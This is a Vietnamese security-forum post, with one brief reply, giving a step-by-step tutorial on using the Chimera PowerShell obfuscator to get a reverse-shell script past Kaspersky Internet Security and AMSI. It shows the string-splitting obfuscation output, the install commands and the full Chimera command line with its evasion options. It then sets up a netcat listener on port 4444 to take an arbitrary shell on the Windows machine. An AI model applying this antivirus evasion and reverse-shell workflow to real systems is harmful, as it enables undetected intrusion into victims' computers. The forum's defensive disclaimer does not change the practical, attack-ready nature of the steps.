Vượt qua phần mềm diệt virus Kaspersky Internet Security với công cụ Chimera

Thảo luận trong 'Exploitation' bắt đầu bởi DDos, 08/09/21, 04:09 PM.

  1. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 2,016
    Đã được thích: 485
    Điểm thành tích:
    83
    Chimera là một tập lệnh làm rối mã PowerShell được thiết kế để vượt qua AMSI và các giải pháp chống vi-rút. Nó xử lý các đoạn mã powershell độc hại và sử dụng thay thế chuỗi và nối các biến để tránh sự phát hiện của các công cụ phát hiện dựa trên chữ ký.

    1.png

    Chimera sẽ thực hiện rất nhiều các kỹ thuật làm rối mã khác nhau để đạt được mục đích vượt qua phần mềm diệt virus. Ví dụ hàm transformer sẽ tách các chuỗi thành nhiều đoạn và cấu trúc lại chúng dưới dạng các biến mới. Ví dụ các ký tự đầu vào của hàm này là ... New-Object System.Net.Sockets.TCPClient ..., thì ký tự đầu ra sẽ là

    Mã:
    $a = "Syste"
    $b = "m.Net.Soc"
    $c = "kets.TCP"
    $d = "Client"
    
    ... New-Object $a$b$c$d ...
    Ở cấp độ cao hơn, hàm sẽ phân tách các chuỗi và kiểu dữ liệu thành các phần khác nhau. Kết quả hàm sẽ trả về là:

    Mã:
    $CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
    $quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
    $JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
    $GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
    $xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
    $zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
    $kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
    $tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
    $mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
    $PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN
    
    Cách sử dụng Chimera

    1. Tải về bằng cách sử dụng lệnh:

    Mã:
    sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
    sudo git clone https://github.com/tokyoneon/chimera
    sudo chmod +x chimera.sh
    2. Hiển thị các tham số của công cụ:
    ./chimera.sh --help

    2.png

    3. Trong thư mục shells, có tất cả 9 loại shell khác nhau. Bạn có thể chọn bất kỳ tệp .ps1 nào để sử dụng cho mục đích thử nghiệm thâm nhập

    3.png

    Có một điều chắc chắn các tệp này sẽ bị xóa nếu bạn đặt một trong số script này vào máy tính chạy Windows có sử dụng phần mềm diệt virus. Bởi đây đều là các tệp độc hại.

    Ví dụ, Kaspersky Internet Security đã xóa tệp generic1.ps1 ngay lập tức khi bạn copy vào hệ thống Windows

    4.png

    4. Bạn cần thay đổi địa chỉ IP của bạn trong tệp generic1.ps1 và cổng bạn mong muốn, để mã hóa tệp lệnh Powershell này, mình dùng lệnh:

    Mã:
    ./chimera.sh -f shells/generic1.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
    copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
    invoke-expression,out-string,write-error -j -g -k -r -p
    
    chimera sẽ tự động chạy, sử dụng các kỹ thuật khác nhau, và tệp cuối cùng nhận được là chimera.ps1.

    5.png

    5. Khi copy tệp chimera.ps1 vào máy tính Windows, Kaspersky Internet Security không hề phát hiện được.

    6.png

    6. Trên Kali Linux, mình chạy lệnh: nc -lnvp 4444 để chờ kết nối

    7.png

    7. Trên máy Windows, chạy chimera.ps1, lúc này, trên Kali Linux, bạn có thể chạy các lệnh shell tùy ý.

    Screenshot 2021-09-08 161601.png
     
    Chỉnh sửa cuối: 09/09/21, 09:09 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    WhiteHat News #ID:2018 thích bài này.
  2. whiteLMK

    whiteLMK Well-Known Member

    Tham gia: 19/02/21, 09:02 AM
    Bài viết: 56
    Đã được thích: 14
    Điểm thành tích:
    8
    Hữu ích đó bác
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    WhiteHat Team thích bài này.